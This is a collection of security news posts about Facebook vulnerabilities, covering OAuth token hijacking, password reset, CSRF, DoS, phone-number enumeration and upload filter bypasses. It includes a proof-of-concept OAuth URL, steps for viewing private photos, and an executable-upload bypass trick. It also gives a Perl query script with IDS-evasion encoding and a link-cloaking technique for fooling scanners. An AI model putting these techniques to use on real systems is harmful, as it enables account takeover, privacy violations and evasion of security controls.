Another OAuth Vulnerability allowed to hack facebook accounts

Just a few weeks ago Nir Goldshlager released a OAuth vulnerability on Facebook. A security researcher Amine Cherrai has also found similar vulnerability on facebook that allowed hackers to get the access_token and full permissions of any account on facebook.

"As you may know, last month Facebook has closed many bugs leading to security reinforcement of  'redirect_uri' parameter and prevent hijacking attacks. One of these reinforcement were rejecting all   'redirect_uri' that has '#' or  '#!'." Researcher wrote in his blog.

"While I was looking in the Facebook Javascript SDK I found something strange, I found that it uses http://static.ak.facebook.com/connect/xd_arbiter.php?version=21#channel=f876ddf24&origin=http://localhost&channel_path=/oauth/PoC_js/?fb_xd_fragment#xd_sig=f3adf0e04c&” as  aredirect_uri and it’s not rejected… So I said let’s use it too!!!"

Amine successfully generated a poc that redirects to another facebook page with the access token.  But he faced some problem while redirecting to external website.

Nir Goldshlager helped Amine by suggesting to redirect to an application in facebook then the application redirects to an external website instead of redirecting directly to an external website. After following the instructions from Nir Goldshlager, he successfully manged to generate a final redirect_uri.


POC video



Facebook has learnt from its previous lessons and is now fixing vulnerabilities as soon as somebody reports them,this Vulnerability has already been fixed.

How researcher Hacked Facebook OAuth To Get Full Permission On Any Facebook Account


A Security Researcher Nir Goldshlager, has discovered a security flaw in Facebook that allowed him to take a full control over any Facebook account.

OAuth is used by Facebook to communicate between Applications and Facebook users, Usally users must allow/accept the application request to access their account before the communication can start. Facebook application might ask for different permissions.

According to researcher, the vulnerability gives a full permissions (read inbox, outbox, manage pages, manage ads, read private photos, videos,etc..) over the victim account .

"To make a successful attack, the victim need to use a Facebook application (Texas Holdem Poker, Diamond Dash, etc..). And these applications only have a basic permissions, We can always change the scope of the application permission and set a new permission but this method not powerfull, Because the victim need to accept the new permissions of the app" Researcher said in his blog.

But researcher discovered that there are built-in Applications(Facebook Messenger) in Facebook that users never need to accept , And this application have a full control on your account.

PoC:

https://www.facebook.com/connect/uiserver.php?app_id=220764691281998&next=https%3A%2F%2Ftouch.facebook.com%2F%23~!%2Fapps%2Ftestestestte%2F&display=page&fbconnect=1&method=permissions.request&response_type=token


Demo:







Password Reset Vulnerability in Facebook allowed hackers to hijack accounts


An Independent Security Researcher, Sow Ching Shiong, has discovered a serious Password reset vulnerability in Facebook that allowed hackers to change the passwords of facebook accounts.

Normally, User is required to enter his current password before they can set the new one to prevent an unauthorized person from changing the password without the user's knowledge.


However, the Researcher identified that a hacker could change user's password without known the user's current password by accessing the url "https://www.facebook.com/hacked", which automatically redirected to the compromised account recovery page.


In this page,  an attacker was simply prompted to enter the new password and confirm it, without having to know any other information.

Facebook Security Team fixed the vulnerability after being notified by the Security researcher and Sow Ching Shiong has been added to Facebook's white hats list ( https://www.facebook.com/whitehat )

Nir Goldshlager found vulnerability in Facebook Employees Secure Files Transfer service

A Web Application PenTester , Nir Goldshlager, has identified a Security flaw in the Facebook's Employee Secure File Transfer that allowed him to reset the password of accounts.

The Secure File Transfer service provider "Acellion" provide service to Facebook's Employee for transferring files.  The Acellion had removed the registration page to prevent unauthorized users from creating accounts.

However, the Researcher discovered that the registration page could still be accessed by someone who know exact direct location of registration form.

After he created the account, he started to analyze the service for a security flaw. He successfully managed to find a critical vulnerability. There is a html file "wmPassupdate.html" which is used for a Password Recovery in Accellion Secure Files Transfer.

Facebook Security Flaw

He identified that there is referrer parameter used in the cookie that encoded with base64. By changing the values of this parameter, he could change the password of any account.

Facebook and Accellion fixed the issue after being notified by the Researcher.  The also claimed to have reported 20+ different bugs in Accellion Secure File Transfer Service. They fixed all of those bugs.

The POC for the vulnerability:


Facebook vulnerability allowed hackers to record video of user and post in his wall


A Cross Site Request Forgery(CSRF) vulnerability in Facebook allowed hackers to record video of target users and post in the victim's wall. The vulnerability was discovered by security researchers Aditya Gupta and Subho Halder, from XYSEC Team .

A malicious hacker could record trick a user to silently record his webcam video and publish it to his facebook wall, without the user even knowing about it.

In a youtube video, researcher demonstrate how an attacker could exploit this vulnerability in a Youtube video.

Four months after researcher notified facebook about the security flaw, facebook finally emailed them that their finding is eligible to receive a bug bounty of $2500, that will come as a Facebook WhiteHat Debit Card.

PoC:

Facebook Hack: vulnerability allows attacker to launch DOS attack against any user


Chris C. Russo, Security expert, has discovered critical vulnerability in the Facebook Chat module that allows an attacker to launch Denial of Service (DOS) attack against any Facebook users.

He discovered a security flaw on 'www.facebook.com/ajax/mercury/send_messages.php' specifically in the parameter 'message_batch[0][body]'. It doesn't have any kind of limit in the amount of characters that can be sent.

So, it is possible for attackers to send a long message that results in DOS condition to a remote user. Since Facebook allows to send message to almost every user, it can be launched against any user.

The researcher has tested the flaw with 3 different testing users. One of the users who use tablet said his tablet got restarted and he is not able to access the Facebook app anymore, since the chat log would remain there and it would make the app crash again.

"In order to prevent this, the length of that parameter should be analyzed *before* sending the information to the addressee user by the asynchronous connection." Researcher said.

"Personally I believe that there must be something wrong with XSRF tokens as well, because it would allow me to send several packets using the same token that I initially extracted,however I couldn't this information due the ban prevention mechanism."

The researcher notified the Facebook before 6 weeks but fb team replied that there is no flaw, So he published the details in seclists.

In the past, he has discovered a security flaw in MSN messenger that allows hacker to send huge amount of big packets cause denial of service.

Security flaw in Facebook exposes user phone numbers

Suriya Prakash, an Indian Security Researcher has discovered a serious flaw in the facebook that allows scammers to get phone numbers of millions of Facebook's users.

If you are one of those person who say proudly i have made my number as private so i am safe, then you must read this news before shouting.

Usually, most of users change the privacy settings in the "Contact info" section in order to hide their mobile numbers from others but they are fail to realize that there is another option that expose their numbers.

In the "How You Connect" section , there is an option for "Who can look you up using the email address or phone number you provided?". By default, it is set to "Everyone".


This allows people to find the Facebook profile by entering phone numbers.  A legitimate users will use this feature to find their friends in the Facebook.  But Cyber Criminals can exploit this feature to get the phone number and corresponding username.

According to researcher, a simple brute-force script can exploit this feature and save phone numbers along with username.  But "Rate limiting on finding users" can prevent this brute-force attack.

Unfortunately, the mobile version of Faebook fails to do that. To demonstrate the bug, he run the script and extract number of phone numbers with username. He also published few extracted information.

He claimed that a large botnet with better script can get the full list of username and phone numbers.

The expert says that he has reached out to Facebook more than five times and provided them with all the details of the exploit in an attempt to get the flaw fixed, but since they haven't acknowledged the existence of the bug he decided to make everything public.

"So to protect yourself against this, change your settings to “My friends” and ask Facebook to provide an “Only me option” and make it such that it is the default setting for all users!." Researcher concluded in his post.

Vulnerability in Facebook app for Android & iOS leads to Identity theft


A new security vulnerability in Facebook application for Android and iOS allows an attacker to steal your Facebook identity.

Gareth Wright,a UK-based app developer for android and iOS has identified a security vulnerability in Facebook mobile application. The problem is that Facebook app doesn't encrypt your login credentials ,leaving them accessible to other malicious apps or USB connections.

He explained the about the hack in this blog post.

Facebook responded this vulnerability discover by issuing the following statement:
"Facebook’s iOS and Android applications are only intended for use with the manufacturer provided operating system, and access tokens are only vulnerable if they have modified their mobile OS (i.e. jailbroken iOS or modded Android) or have granted a malicious actor access to the physical device.

"We develop and test our application on an unmodified version of mobile operating systems and rely on the native protections as a foundation for development, deployment and security, all of which is compromised on a jailbroken device."
This statement appears to indicate that it is only for jailbroken devices; TheNextWeb(TNW) says it is untrue, "Your Facebook app on iOS is absolutely vulnerable because using a tool like iExplore, which is what Wright used to perform his white label hack, does not require a jailbreak."

Researchers also discovered that popular file-syncing app Dropbox also exhibits the vulnerability.

Tracing people by photos on facebook

Security Researcher 'Rjcrystal Decoder' has found a way to find someone profile id using the link to an image file. He explained how to do this in his own blog post.

This trick will helpful to find a person who uploaded image file to facebook by getting the url of the image.  For example:


www.some.fcbdn.akamahid.net/216512_204732556226334_100000687732419_582854_6270883_n.jpg

Here the highlighted one is profile ID of user who uploaded the image. It may look like a simple sequence numbers.  We can get the information of user by using the facebook Graph API.

http://graph.facebook.com/?id=Profile_ID

In our example:
 http://graph.facebook.com/?id=100000687732419

Or you can directly go to the user profile by simply entering the profile ID at the end of this URL:
www.facebook.com/profile.php?id=

In our example:

www.facebook.com/profile.php?id=100000687732419

Facebook "Deactivated Friend Attack" allows attackers to spy on users

University College London research student Shah Mahmood and Chair of Information Communication Technology Yvo Desmedt have uncovered a "zero-day privacy loophole" in facebook that allows CyberCriminals to spy on users.

The Register reports that "Deactivated Friend Attack", was announced at the IEEE International workshop on Security and Social Networking SESOC 2012, held at Lugano, Switzerland on March 19th.

In 'Deactivated Friend attack' , attacker trick a user into accepting him as a friend. Once he become a friend of victim, he can deactivate his own account so that the victim cannot Unfriend the attacker. Facebook accounts can be deactivated and reactivated infinitely, facebook doesn't notify users when his friend has activated or deactivated their account.

Each time the attacker activates his account again, he can access the information posted by the victim. The victim would never know of that information-gathering effort,unless they happened to be paying attention to the temporarily uncloaked account.

"Various groups of information aggregators including marketers, background checking agencies, governments, hackers, spammers, stalkers and criminals would find this attractive as a permanent back door to the private information of a Facebook user.” Researchers said.

Researchers demonstrated the attack by making over 4300 Facebook friends and maintaining access to their Facebook profile information for a period of 261 days.

"No user was able to unfriend us during this time due to cloaking and short de-cloaking sessions. The short de-cloaking sessions were enough to get updates about the victims."Researcher said."We also provide several solutions for the loophole, which range from mitigation to a permanent solution".

How to Access access private photos using Facebook Vulnerability? :Patched

A Vulnerability in Facebook Social Network allows hackers to steal the private photos of users.  The method is posted in a Bodybuilding forum.

The Steps :
  1. Locate the person who you want to view photos of
  2. Click on Report/Block. From the popup menu, select Inappropriate Profile photo and press continue.
  3. Select Nudity or pornography and press continue.
  4. Only check Report to Facebook and press continue.
  5. Only select Help us take action by selecting additional photos to include with your report and press Okay.
The forum member said this vulnerability is patched by Facebook.  But Zdnet says the bug is still there.   They tried the trick and it worked in some profile.
Facebook is try to fix this vulnerability. 

Facebook issued this statement a short time ago:

“Earlier today, we discovered a bug in one of our reporting flows that allows people to report multiple instances of inappropriate content simultaneously.

The bug, was a result of one of our most recent code pushes and was live for a limited period of time. Not all content was accessible, rather a small number of one’s photos. Upon discovering the bug, we immediately disabled the system, and will only return functionality once we can confirm the bug has been fixed.”

Latest Facebook Security flaw leads to EXE file Attachment


Facebook features file uploading ability in message. Facebook security won't allow users to upload Executable files(.EXE files). Nathan Power, A Security Researcher from securitypentest discovered a New vulnerability in Facebook file uploading feature that leads to uploading EXE files. For sending message , you don't need to be friend.


Vulnerability Description:
Facebook security display Error message whenever user try to upload file. Whenever uploading a file, the facebook sends POST request to server. The researcher noticed the parameters of POST method.
Content-Disposition: form-data; name="attachment"; filename="cmd.exe"
Here you can notice filename parameter is used to send the file name. This variable is used to check the file type whether it is allowed to upload or not. If it is .exe file , it will be rejected. Researcher append white space in the end of file in order to bypass the checking. Successfully it worked for him.


Post Request Contents

He reported to Facebook about this vulnerability and they now fixed.

Facebook,google+ Vulnerable to bypass content restrictions


Facebook is now vulnerable to bypass content restrictions on links and posts put on a user's public wall. Facebook was notified of these vulnerabilities on July 31st, 2011. To date (October 4, 2011) Facebook has yet to do anything about this So BlackhatAcademy decided to release it in public.

FQL
Simply requiring an API key for privileged queries does not protect facebook from people arbitrarily obtaining one. Facebook was even so kind as to give a reference of tables and columns in the documentation for FQL. To access Facebook's FQL API, it takes only a well-formed HTTP request with an embedded API key to return a valid XML object. FQL Does not allow the use of JOINS, however it is not needed as everything is thoroughly documented. Attackers can misuse this during the creation of a malicious facebook application or directly on the FQL development api page for information gathering. The implementation below uses LibWhisker2 for IDS evasion via session splicing.


#!/usr/bin/perl
use warnings;
use XML::Simple;
use LW2;
use Getopt::Std;
my %opts;
getopts('q:',\%opts);
my $query = $opts{q} if defined $opts{q};
$query = "SELECT pic_big FROM user WHERE uid=6666666" unless defined $opts{q};
my $ref = fqlQuery($query);
foreach my $parent (sort keys %{$ref}) {
    if (%{$ref->{$parent}}) {
        print "$parent: \n";
        foreach my $key (sort keys %{$ref->{$parent}}) {
            if (%{$ref->{$parent}->{$key}}) {
           print "\t$key : \n";
               foreach my $mojo (sort keys %{$ref->{$parent}->{$key}}) {
                   print "\t\t$mojo : ";
                   print $ref->{$parent}->{$key}->{$mojo};
           print "\n";
           }
            } else {   print "\t$key : ";
               print $ref->{$parent}->{$key};
               print "\n";
            }
        }
    } else {
        print "$parent : " . $ref->{$parent} . "\n";
    }
}
sub fqlQuery {
    my $q = shift;
    $q =~ s/ /%20/g;
    my $link = "http://api.facebook.com/method/fql.query?query=$q";
    my $text = download($link,"api.facebook.com");
    my $ref  = XMLin($text);
    return($ref);
}
sub download
{
    my $uri = shift;
    my $try = 5;
    my $host = shift;
    my %request;
    my %response;
    LW2::http_init_request(\%request);
    $request{'whisker'}->{'method'} = "GET";
    $request{'whisker'}->{'host'} = $host;
    $request{'whisker'}->{'uri'} = $uri;
    $request{'whisker'}->{'encode_anti_ids'} = 9;
    $request{'whisker'}->{'user-agent'} = "";
    LW2::http_fixup_request(\%request);
    if(LW2::http_do_request(\%request, \%response)) {
        if($try < 5) {
            print "Failed to fetch $uri on try $try. Retrying...\n";
            return undef if(!download($uri, $try++));
        }
        print "Failed to fetch $uri.\n";
        return undef;
    } else {
        return ($response{'whisker'}->{'data'}, $response{'whisker'}->{'data'});
    }
}

Content Forgery
While most major sites that allow link submission are vulnerable to this method, sites including websense, google+, and facebook make the requests easily identifiable. These sites send an initial request to the link in order to store a mirror thumbnail of the image, or a snapshot of the website being linked to. In doing so, many use a custom user agent, or have IP addresses that resolve to a consistant domain name. Facebook IP addresses resolve to tfbnw.net, also set a custom user agent of "facebookexternalhit". Google+ (Also notified Jul. 31st and guilty of reasonable care) again follows suit and utilizes "Feedfetcher-Google" as their user agent. Knowing this, we can easily filter out requests coming from these websites, and offer up a legitimate image to be displayed on their site, while redirecting or displaying a completely different page to anyone that follows the links. Facebook's recent partnership with websense is laughable, due to websense's "ACE" security scanner that is just as easily identified, by using gethostbyaddr in order to resolve the IP back to websense.com. Utilizing this technique, would allow an overwhelming number of malware sites to remain undetected to their automatic site analysis. Other places like digg.com either spoof a user agent to look like normal traffic, or forward the client's user agent, which makes it more difficult to catch every one of their requests. Fortunately, digg.com only requests the link once, prior to submitting the link to the world. This allows attackers to serve up a legitimate image until that initial request clears our server, and then replace it with a less than honest file. We have affectionately named this vulnerability class Cross-Site Content Forgery.

For more info follow this LInk:
http://www.blackhatacademy.org/security101/index.php?title=Facebook